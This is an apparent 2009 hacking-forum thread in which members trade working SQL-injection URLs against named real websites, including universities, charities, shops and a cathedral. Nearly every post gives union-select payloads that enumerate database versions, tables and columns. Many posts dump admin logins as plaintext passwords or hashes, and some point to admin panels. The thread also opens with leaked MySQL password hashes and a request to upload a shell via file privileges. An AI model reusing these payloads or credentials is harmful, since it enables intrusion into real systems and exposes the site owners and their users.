root:0fdabf2d0422efe4:Y,claroroot:28ba5d674194eb31 :Y,debian-sys-maint:*3DDF0119DF873573462050B67B02D659CA586C52,di r-dic:47f1e8824f72016b:Y,elka:40cc7d9422737e7e:Y,dic web:35be89a25baf7df9:Y,fabio:05d26b55199cdec1:Y,eg jp:40cc7d9422737e7e:Y,leo:5ccae1205bd560b6:Y

anyone who is a strong expert on the file_priv Y topic, I just read somewhere that you can upload a shell through SQL, please upload one and send it to me by PM ))) if you don't mind

AlexSatter
20.05.2009, 17:52
PR3, TIC 120

http://www.replicator.ru/part.php?news_sort=-2+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8,9,10,11,12,13,14,15

5.0.67-log:u12550@10.10.153.190:u12550

http://www.replicator.ru/part.php?news_sort=-2+union+select+1,2,3,4,5,TABLE_NAME,7,8,9,10,11,12 ,13,14,15+from+information_schema.tables

Only one table caught my interest: ACS

http://www.replicator.ru/part.php?news_sort=-2+union+select+1,2,3,4,5,COLUMN_NAME,7,8,9,10,11,1 2,13,14,15+from+information_schema.columns+where+T ABLE_NAME=0x414353

ID_ACS
ID_SITE
ID_MENU
AUTH_ADMIN
PASS_ADMIN
PRIM

seemingly just what's needed... tried to output the contents, nothing...

http://www.replicator.ru/part.php?news_sort=-2+union+select+1,2,3,4,5,count(*),7,8,9,10,11,12,1 3,14,15+from+ACS

no records..

HAXTA4OK
20.05.2009, 18:17
PR: 4

http://www.earthsystem-school.unimore.it/tematiche.php?id=1+union+select+1,version(),3,4--

5.0.45

http://www.earthsystem-school.unimore.it/tematiche.php?id=1+union+ select+1,table_name,3,4 +from+informati on_schema.tables--

A bunch of tables)))

R1dex
20.05.2009, 18:27
http://antesthermo.ru/03topmenu/09news/?cont_id=235+and+1=0+union+select+1,2,3,4,5,6,7,8, concat(name,0x3a,pass),0,1,2,3,4,5+from+users--

HAXTA4OK
20.05.2009, 18:43
PR: 5
http://www2.dse.unibo.it/dsa/profile.php?id=-1+union+select+1,2,3,4,versio n(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,2 3,24 ,25,26--

5.0.41-log

again a set of tables:

http://www2.dse.unibo.it/dsa/profile.php?id=-1+union+select+1,2,3,4,group_concat(table_name),6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26+from+information_schema .tables+group+by+table_s chema+limit+0,1--

acquisti,acquisti_dettagli,biblioteca,checklist,co mputer,concorsi,decreti,dsa_lista_attesa,dsa_log_r ichiesta_intervento,dsa_utenti,elenco_software,int _report,int_richieste,log_accessi,messaggi,monitor ,ni_cliente,ni_compatibilita_ricambio_stampante,ni _log_consumabili,ni_magazzino_ricambi_stampante,ni _modello_stampante,ni_oggetto,ni_on


#######################################
PR: 4

http://it.pewaukee.k12.wi.us/employment/ath_jo bs/viewjobcategory_ath.php?ID=-1+union +s elect+1,concat_ws(0x3a,version(),databas e() ,user()),3/*

4.0.26a:employ_athl:jappt@localhost

Tigger
20.05.2009, 22:37
[Site]: http://banzaj-ra.com
[Info]: 5.0.51-log:1gbua_x_banza5aa@213.186.117.199:1gbua_x_banza 5aa
[Sploit]: http://banzaj-ra.com/index.php?mod=news&id=-1+union+select+1,concat_ws(0x3a,login,password,mai l),3,4+from+user--

P.S.
Quotes get through, but it seems the privileges are insufficient.

AlexSatter
20.05.2009, 23:57
URL: http://www.sbiznis.com/grad.php?id=138+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14
INFO: http://www.sbiznis.com/grad.php?id=-138+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14
4.0.27-max-log:sbiznis@68.178.232.60:sbiznis
DIR SITE: /home/content/b/i/z/biznis/html

ivanko.rus
21.05.2009, 07:38
By the way, here's another: I didn't really work it through, but I think it will do
http://www.biomedicas.unam.mx/investigacionFrame.asp?ID=MG%27+or+1=(select+top+1 +table_name+from+information_schema.tables)+--+

Rav1n
21.05.2009, 08:34
http://www.deltarescue.org/deltarescue/war/item.php?id=-21+union+select+1,cast(concat_ws(0x3a,version(),da tabase(),user())+as+binary),3,4,5,6,7--

4.1.11-Debian_4sarge8-log:deltarescue:deltarescue@localhost
_____
http://www.minelab.com/consumer/page.php?section=-128+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--

4.0.24-nt-max-log:vs255889_1:vs255889_1_dbo@wic016v.server-web.com

farex
21.05.2009, 14:47
<<Newton's Apple>>
http://www.newtonsapple.tv/TeacherGuide.php?id=902'+union+select+1,2,3,concat _ws(0x3a2a3a,version(),database(),user(),@@version _compile_os),5,6,7,8,9,0,1,2,3,4,5--+
4.1.20:*:newtons:*:tpt@tptwebserver.win2k.tpt.org: *:redhat-linux-gnu

4eburator
21.05.2009, 18:13
http://test.omnisoftsol.com/listing_video.php?catid=3
version(): 4.1.22-standard
user(): omnisoft@localhost
database(): vsec_test

Tables:
customers
phpads_config
phpads_clients
products
phpads_affiliates

http://www.surfchanneltv.net/listing_video.php?catid=29
version(): 4.1.22-standard
user(): surfchan@localhost
database(): surfchan

Tables:
customers
phpads_config
phpads_clients
products
phpads_affiliates

DezMond™
21.05.2009, 18:31
PR4
http://www.stpaulseatingdisorders.ca/content.php?id=-17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16+/*+

http://www.context-market.ru/news.php?id=198&item=225+union+select+1,2,database(),4,5,6,7,8,9,1 0+/*+
cmarket

AlexSatter
21.05.2009, 18:33
http://www.amento.ru/news/new.php?id=-16+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5
4.1.22-log:amento@localhost:amento

http://www.amento.ru/news/new.php?id=-16+union+select+1,2,3,concat_ws(0x3a,user,password ),5+from+users
amento:5c8904a4b82b1f9bfc3a115cfcd30528

admin panel: http://www.amento.ru/admin/

PR 0, TIC 20

Gorev
21.05.2009, 19:03
http://www.ldmstudio.com/director/detalii_site.php?id=-4677+UNION+SELECT+1,2,concat_ws(0x3a,version(),dat abase(),useR(),@@version_compile_os),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22--


Database Version: 5.0.77-community-log
Database name: ldm_director
User name: ldm_ldmbd@localhost
Os: pc-linux-gnu

HAXTA4OK
21.05.2009, 19:11
TIC: 50 PR: 2
http://www.svto.ru/page.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10/*

5.0.45

http://www.svto.ru/page.php?id=-1+union+select+1,2,3,group_concat(table_name),5,6, 7,8,9,10+from+information_schema.tables+group+by+t able_schema+limit+1,1/*

svto_pages,svto_member,svto_group_tov,svto_service ,svto_admins,svto_product,svto_news,svto_guestbook ,svto_tovar,svto_banners,svto_rubric,svto_offer,sv to_korz,svto_users,svto_feedback,svto_series,svto_ order,svto_manufacturer,svto_gallery_pics,svto_ser ies1,svto_about
5

DezMond™
21.05.2009, 19:47
PR5
http://www.abandonware-france.org/ltf_abandon/ltf_solutions.php?id_soluce=-146+union+select+1,2,3,concat(0x2C,id,char(58),pse udo,char(58),password,char(58),droits,char(58),typ e,0x2C),5+from+ltfv5_admin_membres--

The site is HUGE!!!
Never did find the admin panel((

HAXTA4OK
21.05.2009, 19:52
TIC: 40 PR: 3
http://www.knigazhizny.ru/view_zavalinka.php?id=-1'+union+select+1,version(),3,4,5,6,7,8,9,10+--+

5.0.67-community

online,zavalinka,book,comments,galstuk,settings,ca tclass,comments_setting,gazeta,staty,categories,de tcvo,kuhny,navigation,userlist,biblioteka,class,dn evnik

http://www.knigazhizny.ru/view_zavalinka.php?id=-1'+union+sel ect+1,group_concat(concat_ws(0x3a,user,pass)),3,4, 5,6,7,8,9, 10+from+u serlis t+--+

domhoz:hozd

Rubaka
21.05.2009, 20:44
http://www.liveatdot.com/program/details.php?id=224+UNION+SELECT+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 +LIMIT+1,1

Database Version: 5.0.26
Database name: liveatdot_dates
User name: liveatdot22@localhost

HAXTA4OK
21.05.2009, 21:15
http://www.freetests.ru/states.php?act=show&id=-1+union+select+1,2,version(),4,5--

5.0.67-percona-highperf-b7-log

http://www.freetests.ru/states.php?act=show&id=-1+union+select+1,2,group _concat(table_name),4,5+from+information_schema.ta bles+group+by+t able_schem a+limit+0,1--


The matrix
21.05.2009, 23:07
globalmentalhealth.org Pr-5
Forum: http://globalmentalhealth.org/forum/
http://www.globalmentalhealth.org/articles.php?id=-1+union+select+1,2,null,schema_name,5,6,7,8,9,10+f rom+information_schema.schemata+limit+2,1

gmhorg_phpBB


http://www.globalmentalhealth.org/articles.php?id=-1+union+select+1,2,null,concat(username,0x3a,user_ password),5,6,7,8,9,10+from+gmhorg_phpBB.phpbb_use rs+limit+1,1


bala:$H$7zp4zVUO3SA6YklQHSK2rex6B71r0F1

I don't want to decrypt it.

AlexSatter
21.05.2009, 23:50
http://www.baby-knitting.ru/prod.php?md=-11+union+select+1,2,concat_ws(version(),user(),dat abase()),4,5,6,7,8,9,10,11,12,13

babykn_babykn@localhost5.0.77-communitybabykn_babykn

http://www.baby-knitting.ru/prod.php?md=-11+union+select+1,2,table_name,4,5,6,7,8,9,10,11,1 2,13+from+information_schema.tables

PR 2, TIC 210

AlexSatter
22.05.2009, 00:30
http://moraru.ru/prod.php?id_product=-4+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12--

5.0.67-log:u156180@10.10.227.61:u156180

http://moraru.ru/prod.php?id_product=-4+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 +from+information_schema.tables--
A large number of tables, about 300.
Found this table there: b_user

http://moraru.ru/prod.php?id_product=-4+union+select+1,concat_ws(0x3a,login,password),3, 4,5,6,7,8,9,10,11,12+from+b_user--

admin:Iq{28kX{10d8e0838e85fcc17ccd06fe9eb9af4f

PR 2, TIC 10

DezMond™
22.05.2009, 00:33
http://totalshottrainer.com/content.php?id=-4+union+select+1,database(),3,4,5,6,7,8,9,10,11,12 ,13,14,15+/*+
totalsho_totalsho

Tigger
22.05.2009, 01:08
[URL]: http://29r.ru
[Info]: 5.0.75-percona-highperf-b11-log:a3940_test@94.103.90.190:a3940_test
[Sploit]: http://29r.ru/index.php?page=6_0&id=-1+union+select+1,2,3,concat_ws(0x3a,user,pwd)+from +users+--+

Kimliksiz
22.05.2009, 01:11
http://www.detki-74.ru/gcards/getnewsitem.php?newsid=1+union+select+1,2,concat(u sername,char(45),userpass),4,5+FROM+gc_cardusers--

admin-3bb5029c0a7f3f6b81e744ea798e3d9d

AlexSatter
22.05.2009, 09:56
http://www.dyadem.com/media/pr.php?id=-3909+union+selecT+1,2,3,4,concat_ws(0x3a,version() ,user(),database())

4.1.22-community-nt:darren@localhost:cms

DocumentRoot: C:\Program Files\Apache Software Foundation\Apache2.2\htdocs

PR 5, TIC 10

Anti-repost: checked
----------------------------
http://www.ecpa.org/pr/pr.php?id=-95+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),user(),database()),8,9,10,11,12,13

4.0.27-max-log:ecpaweb@68.178.211.7:ecpaweb

http://www.ecpa.org/pr/pr.php?id=-95+union+select+1,2,3,4,5,6,concat_ws(0x3a,usernam e,password),8,9,10,11,12,13+from+admin

sheri:monday

PR 6

Anti-repost: checked

--------------------------------------------

http://www.steinerbooks.org/p.php?id=-7+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9

4.1.22:anthroposophic@localhost:steinerbooks

PR 4
---------------------------------------------
http://www.mika-norilsk.ru/razdel.php?id=-19+union+selecT+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6

5.0.67-community:norilsk6_mainuse@localhost:norilsk6_mika norilsk

http://www.mika-norilsk.ru/razdel.php?id=-19+union+selecT+1,table_name,3,4,5,6+from+informat ion_schema.tables

http://www.mika-norilsk.ru/razdel.php?id=-19+union+selecT+1,concat_ws(0x3a,login,password),3 ,4,5,6+from+tab_admin

User:Password - 888:999
-------------------------------------

http://www.amadey-center.ru/razdel.php?id=-8+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5

4.1.22-log:amadeyce_linkomp@fe43.hc.ru:wwwamadeycenterr_l inkomp

-------------------------------------
http://www.pronv.com/razdel.php?id=-7+union+selecT+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9

4.1.22-MAX-LOG:PRONV@68.178.254.62:PRONV
------------------------------------

satana8920
22.05.2009, 13:42
http://www.salisburycathedral.org.uk/news.php?id=-357+unioN+seLect+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,version(),19,20,21,22,23/*
Page Rank: 5
Database Version: 4.1.20
Database name: salisburycathedral
User name: salisburycathedr@localhost
tables:
homepage
links
log
news

http://www.ihrc.org.uk/show.php?id=-1412+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13--
Database Version: 4.0.27-standard-log
Database name: db120565932
User name: dbo120565932@212.227.119.149
tables:
info

http://www.footballfoundation.com/news.php?id=-905+union+select+1,2,3,4,5,6,7--
Page Rank: 6
Database Version: 4.1.10a-log
Database name: nff
User name: nff@localhost
tables:
admin
news

http://audiobookdeals.com/audiobook-news-show.php?id=-43+union+select+1,version(),3,4--
Page Rank: 2
Database Version: 4.1.22
Database name: audioboo_content
User name: audioboo_psostre@156389-web1.sostreassoc.com
tables:
articles
news

AlexSatter
22.05.2009, 13:47
http://photoloopa.com/en/index.razdel.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database()),6

5.0.32-Debian_7etch6-log:z73749_main@77.221.130.26:z73749_main

There is a table: psg_user, with a bunch of columns (46)

http://photoloopa.com/en/index.razdel.php?id=-1+union+select+1,2,3,4,column_name,6+from+informat ion_schema.columns+where+table_name=0x7073675f7573 657273+limit+46,1

http://photoloopa.com/en/index.razdel.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,first_name,p assword),6+from+psg_users
etc.

------------------------------
http://www.ruriders.com/statya.php?id=-15395+union+selecT+1,2,3,4,5,6,concat_ws(0x3a,vers ion(),user(),database()),8,9,10,11,12,13

5.0.77-log:m58187_uIbarbe@localhost:m58187_Ibarbero


TIC 100
---------------------------------
http://www.papor.ru/statya.php?id=48+union+selecT+1,2,3,4,concat_ws(0x 3a,version(),user(),database()),6,7,8,9,10,11

5.0.70-log:dbu_ansimov_1@localhost:pp

TIC 10

Krist_ALL
22.05.2009, 16:04
PR 2

http://www.tutpricol.ru/message.php?id=-1/**/union/**/select/**/1,2,concat_ws(0x3a,version(),user(),database()),5, 4,6,7+

adminka - http://www.tutpricol.ru/admin/
login - admin
pass - sevagin

version() - 4.1.22-log
user() - tutpric5_root@localhost
database() - tutpric5_tutpricol

nemaniak
22.05.2009, 18:08
PR3

http://www.promocamp.com/news.php?idnews=-527%20union%20select%201,concat_ws(0x3a,user(),dat abase(),version()),3,4,5,6,7,8

promocamp@localhost:promocamp:5.0.79

Tables:

assoc
cat
news
pr_agriturismi
pr_associazioni
pr_banner
pr_campeggi
pr_centri
pr_fiere
pr_legislazione
pr_link
pr_noleggiatori
pr_riviste
pr_sosta
prov
reg
sezioni

Rubaka
22.05.2009, 18:45
http://www.hetkookatelier.nl/admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users

DezMond™
22.05.2009, 19:17
PR7
https://www.iifiir.org/en/news.php?rub=2+union+select+1,2,TABLE_NAME,4,5,6+f rom+information_schema.tables--&page=2&id=1871#2 union select 1,2,TABLE_NAME,4,5,6 from information_schema.tables--
The tables I need are locked((

http://www.studio2.gr/studio2/newsen.php?id=-18+union+select+1,username,3,4,password+from+users/*
studio2::!studio_dyo!

L I G A
22.05.2009, 19:19
ari.ru Агентство Русской Информации (Russian Information Agency)

http://ari.ru/publication/?id=-203+union+select+1,concat_ws(0x203a20,version(),da tabase(),user(),@@version_compile_os)--

version():version():5.0.67
database():ariru3_
user():ariru3_ariru@localhost
os redhat-linux-gnu

listing the tables with limit

http://ari.ru/publication/?id=-203+union+select+1,table_name+from+information_sch ema.tables+limit+15,1


the users table

http://ari.ru/publication/?id=-203+union+select+1,table_name+from+information_sch ema.tables+limit+51,1

listing the users with limit

http://ari.ru/publication/?id=-203+union+select+1,concat(0x3a,nick,password)+from +users+limit+2,3

a few users:
Гром gridoza
Арт erasure
ИванЦ qawert
Виктор 198895
— Admin —Druzhinnik etc...

DezMond™
22.05.2009, 19:27
http://www.longwy.eu/index.php?pg=11&id=-517+union+select+1,2,group_concat(TABLE_NAME),4,5, 6,7,8+from+information_schema.tables/*

http://www.art-ks.org/index.php?id=-153+union+select+1,2,3,concat(login,char(58),pwd), 5,6,7,8,9,10+from+users/*
erhart::e10adc3949ba59abbe56e057f20f883e --123456

DezMond™
22.05.2009, 19:52
http://referat.by/subjects.php?btn=&level=2&subj=6&page=0&size=2&id=-152+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,Nam e,Passwd,rights),7+from+accounts--
1::Andrew::5d266ec24ed1234fd0a41c45912090e4::00000 0000000

nemaniak
22.05.2009, 20:50
PR3

http://viviravenna.it/dettevento.php?idevento=-14298+union+select+1,concat_ws(0x3a,user(),databas e(),version()),3,4,5,6,7,8,9,10,11,12,13

viviravenna_it@localhost:viviravenna_it:5.0.79

http://viviravenna.it/dettevento.php?idevento=-14298+union+select+1,concat_ws(0x3a,user,userpwd), 3,4,5,6,7,8,9,10,11,12,13+from+m_utenti

Utente7150:17634
Utente3501:232094168
Utente7232:661581938

satana8920
22.05.2009, 20:55
http://www.alternativegrounds.com/show.php?ID=-20+union+select+1,2,3,4,5,6,7,8,9--
Page Rank: 4
Database Version: 4.0.18-Max
Database name: alternativegro
User name: alternativegro@www6.inetwave.com
PS didn't find a single table :(

Rav1n
23.05.2009, 03:40
http://www.ifesworld.org/news/item.php?itemID=-1523+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0 x3a,version(),database(),user()),12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31--

5.0.77-community-log:xnjafc_ifesworld:xnjafc_ifesworld@localhost

tables:
http://www.ifesworld.org/news/item.php?itemID=-1523+union+select+1,2,3,4,5,6,7,8,9,10,cast(group_ concat(table_name)+as+binary),12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31+from+infor mation_schema.tables--
_______

http://www.latrobe.edu.au/lupa/news-item.php?id=-30+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user())--

4.1.22-log:lupa:lupa@web.latrobe.edu.au
______

http://www.indstate.edu/news/news.php?newsid=-1785+union+select+1,concat_ws(0x3a,version(),datab ase(),user()),3,4,5,6--

5.0.45-community-nt-log:news:news@localhost

tables:

a few accounts (ID,username,password)

mailbrush
23.05.2009, 11:49
http://www.invivogen.com/family.php?ID=-97+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,c oncat_ws(0x3a,user(),database(),version()),16,17--
visiteur@localhost:invivo:4.1.22

Gorev
23.05.2009, 13:56
http://www.bentel.ro/produse.php?idSubcategorie=3246&idProdus=-39409+union+select+concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),2


Database Version: 5.0.45
Database name: bentelsite
User name: bentelsite@localhost
Os:redhat-linux-gnu

Krist_ALL
23.05.2009, 14:12
PR 1
http://pirotex.ru/content.php?id=-23'+union+select+version()+from+news/*'
Output goes into <title>. 4.x branch of the DB. Didn't find a single table
login -1' or 1=1/*'
password: any



jokester: ethaicd.com is a REPOST, don't restore what I delete

Gorev
23.05.2009, 14:33
http://www.calcatinge.ro/index.php?idCategorie=47+UNION+SELECT+AES_DECRYPT( AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),Us er(),@@version_compile_os),0x71),0x71),2--%20&lang=ro

Database Version: 5.0.77
Database name: calcat_calcatinge
User name: calcat_root@localhost
Os: portbld-freebsd6.2

erihtoney
23.05.2009, 14:49
http://www.mintakafoundation.org/projet.php?id=-1+union+select+1,2,concat_ws(0x20,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17--

version 5.0.67-log
user mintakaDB@imu139.infomaniak.ch
database mintakafoundationorg

Krist_ALL
23.05.2009, 16:37
PR 3

http://www.globus.naztrans.ru/CityInfo.php?Number=-9600+union+select+concat_ws(0x202d20,version(),use r(),database(),@@version_compile_os),2,3,4,5

user() - karalex_georg@localhost
version() - 5.0.67-community
database() - karalex_globus
os - redhat-linux-gnu


Nothing interesting in the DB...
A list of cars, photo ids, comments, news.

cities
authors
gallereies
news
pages
photos
results
usercoments
video
etc...

Gorev
23.05.2009, 17:08
http://www.mysupermarket.ro/produse.php?pID=227+union+select+1,2,3,4,concat_ws (0x3a,version(),database(),user(),@@version_compil e_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+ limit+1,1

Database Version: 5.0.27
Database name: db_mysupermarketro
User name: mysupermarketro@localhost
Os: redhat-linux-gnu


http://www.mysupermarket.ro/produse.php?pID=227+UNION+SELECT+1,2,3,4,(SELECT+C ONCAT_ws(0x3a,aUsername,aPassword,aemail)+FROM+db_ mysupermarketro.Account+LIMIT+x,1),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21+limit+1,1

DezMond™
23.05.2009, 17:20
PR4
http://www.sault.ymca.ca/content.php?ID=-65+union+select+1,2,3,4,5,concat_ws(0x3a3a,admin_u ser_type,admin_user_workflow,admin_username,admin_ password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+fro m+Admin_Users+/*+
1::1::ymca_2008::ymca_fitness

Gorev
23.05.2009, 17:39
http://www.cnr-unesco.ro/ro/stire.php?id=-121+UNION+SELECT+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5,6,7,8,9,10 ,11/*


Database Version: 4.1.22
Database name: tibiq_unesco
User name: tibiq_unesco@localhost
Os: redhat-linux-gnu

RulleR
23.05.2009, 18:23
[PR 3]
http://www.timeshare-obmen.ru/bonus.php?id=-3448449+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0 x3a,version(),database(),user()),11,12,13--
5.0.26-log:timeshareb:timeshareb@localhost

[PR 3]
http://www.piyanas.com/bonus.php?id=-1361+union+select+1,2,concat_ws(0x3a,version(),dat abase(),user())--&lang=en
5.0.51a-community:piyanas_db:piyanas_piyanas@localhost
http://www.piyanas.com/bonus.php?id=-1361+union+select+1,group_concat(table_name),3+fro m+information_schema.tables--&lang=en
ilo_administrator_user
http://www.piyanas.com/bonus.php?id=-1361+union+select+1,group_concat(column_name),3+fr om+information_schema.columns+where+table_name=0x6 96c6f5f61646d696e6973747261746f725f75736572--&lang=en
columns from table ilo_administrator_user
administrator_id,username,password,menu1,menu2,men u3,menu4,menu5,menu6,menu9,description
http://www.piyanas.com/bonus.php?id=-1361+union+select+1,concat_ws(0x3a,administrator_i d,username,password),3+from+ilo_administrator_user--&lang=en
administrator_id,username,password
1:admin:py9999
2:sale:1234
3:manager:1234

_Quest_
23.05.2009, 19:01
SHOP http://store.yeproc.com

_http://www.yeproc.com/upload/media/view_media.php?id=-459+union+select+1,2,3,user(),version(),6,7,8,9,10 ,11,12,13,14,15,16,17--


189 :In database redeyedb found table store_fixes_recreate_orders

and the second DB.

214 :In database redeyedb found table store_order
udman
23.05.2009, 19:10
http://zona.zp.ua/boardname.php?c=-85+UNI ON+SELECT+0,concat_ws(0x0 b,user(),version(),database())
ivan_zona@localhost
5.0.77-community
ivan_zona

User logins and passwords

http://zona.zp.ua/boardname.php?c=-85+UNION+SELECT+0,c oncat_ws(0x0b,password,u_email)+FROM+ivan_zona.use r s+--+

http://ok.salgir.info/ok_adv.php?gr=79&r=84+UNION+SELECT+1,CONCAT(user(),0x0b,database(), 0x0b,ve rsion()),3,4+FROM+users+LIMIT+1,10--

u_client_salgir@localhost
salgir
4.1.22-log

Users

http://ok.salgir.info/ok_adv.php?gr=79&r=84+UN ION+SELECT+1,CONCAT(user(),0x0b,database(),0x0b,ve rsion()),3,4+FROM+u sers+LIMIT+1,10--


http://alchevsk-city.com/board.php?board=8'+UNION+SELECT+0,1,2,concat_ws(0x 0b,version(),datab ase(),us er()),4+--+

4.1.22-standard
total_city
total_city@localhost


http://crimea.swingua.net/index.php?find_age=-2+UNION+SELECT+0,2,3,4,5,6,7,CONCAT_WS(0x0b,Ve rsion(),Database(),U ser()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25+--+&find_month=300&find_status=6&find_who=100&mod=search&sortby=D


4.1.22-standard
handy_crimea
handy_crimea@localhost

beerhack
23.05.2009, 20:56
PR6
http://www.augustana.edu/academics/music/department/facultyBio.php?ID=-1+union+select+1,2,3,4,concat_ws(0x3a,user,passwor d),6,7,8,9,10,11+from+mysql.user/*
Database Version: 4.1.22-log
Database name: music
User name: music@freya.augustana.edu

music:244ed17b5aa3b964

DezMond™
23.05.2009, 21:26
http://www.reformjudaismboston.org/content.php?id=-108'+union+select+1,database(),3,4,5,6,7,8,9,10,11 ,12+--+
reformjudaismboston_org_-_invision2

Gorev
23.05.2009, 21:29
http://www.netmedica.ro/stire.php?id=-63+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),useR(),@@version_compile_os),3,4--


Database Version: 5.0.54-log
Database name: netmedica
User name: netmedicasql@localhost
Os: pc-linux-gnu

http://www.netmedica.ro/stire.php?id=-63+UNION+SELECT+1,concat_Ws(0x3a,user_name,user_pa sswd),3,4+FROM+netmedica.users+LIMIT+x,1--


DezMond™
23.05.2009, 21:51
pr6
http://www.semops.com/content.php?id=-296+union+select+1,2,3,4,5,6,7,database(),9,10+fro m+users+/*+
semops
Couldn't guess the columns((

http://www.jimmcleantexas.com/content.php?id=-33+union+select+1,2,username,password,5,6,7,8,9+fr om+admin+/*+
admin::21232f297a57a5a743894a0e4a801fc3 - admin

AlexSatter
24.05.2009, 00:04
-------------------------------------------------

http://www.clubservices.com.mx/prov.php?id=116+union+select+1,2,3,4,5,6,7

5.0.45:sci@localhost:SCI

tables: http://www.clubservices.com.mx/prov.php?id=-116+union+select+table_name,2,3,4,5,6,7+from+infor mation_schema.tables

--------------------------------------------------------
http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,concat_ws( 0x3a,version(),user(),database())

5.0.32-Debian_7etch10-log:hnk@localhost:hnk

what we're interested in:
http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,table_name +from+information_schema.tables+limit+34,1/*

fields:
user_id
type
first_name
last_name
email
login
password

Number of records: http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,count(*)+f rom+users/*
one record

http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,concat_ws( 0x3a,login,password)+from+users/*
zlatko:monografija

-------------------------------------

May God forgive me. Next site
http://www.tyri.orthodox.ee/novosti.php?id=51+union+select+1,2,3,4,5,6,7,8

http://www.tyri.orthodox.ee/novosti.php?id=51+union+select+1,2,concat_ws(0x3a, version(),user(),database()),4,5,6,7,8
4.1.20:orthodox@localhost:orthodox

-------------------------------------

DezMond™
24.05.2009, 01:09
http://www.auchinachie.com/content.php?id=-8+union+select+1,2,id,4,password,6,7,8,9,10,11,12, 13,14,15+from+users+/*+
0000000247::bluepix05

DeepXhadow
24.05.2009, 03:28
http://ej.kubagro.ru/a/viewaut.asp?id=11+UNION+SELECT+1,2,3,4,5,6,7,8,9,1 0,11,12,13+from+news

Microsoft JET Database Engine

Kimliksiz
24.05.2009, 03:37
http://www.fig.gr/index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5 ,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username ,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*

admin:b86104f63387af1ccb1d049223680a2c

Skofield
24.05.2009, 13:13
http://www.amherst250.org {PR 4}
http://www.amherst250.org/index.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),user()),8,9,10,11/*

4.1.20 : amherst250bs : fclerk@localhost

------------------------------------------------------------------------------------------------

http://www.newcastlemusic.com {PR 4}
http://www.newcastlemusic.com/artists.php?ID=-2340+union+select+1,concat_ws(0x3a,version(),datab ase(),user())/*

4.1.22-log : agoodwi_newcastlemusic : agoodwi_nmsite@bsd8.qnetau.com